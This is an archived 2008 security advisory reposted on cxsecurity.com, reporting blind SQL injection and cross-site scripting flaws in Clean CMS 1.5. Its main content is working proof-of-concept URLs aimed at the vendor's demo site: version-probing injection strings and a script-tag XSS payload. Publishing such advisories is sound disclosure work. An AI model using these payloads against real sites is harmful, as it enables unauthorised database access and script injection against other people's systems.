Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.

2008.12.02
Credit: ZoRLu
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln. [~] [~] script: http://www.4yoursite.nl/script_clean_cms.php [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu msn: trt-turk@hotmail.com [~] [~] Home: www.z0rlu.blogspot.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: RedHaK Kardesime ozel tesekurler. [~] ----------------------------------------------------------- exp for demo: http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true ) http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false ) XSS for demo: http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script> [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & RedHaK [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/32474
http://www.milw0rm.com/exploits/7230
http://www.milw0rm.com/exploits/7228
http://secunia.com/advisories/32866


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top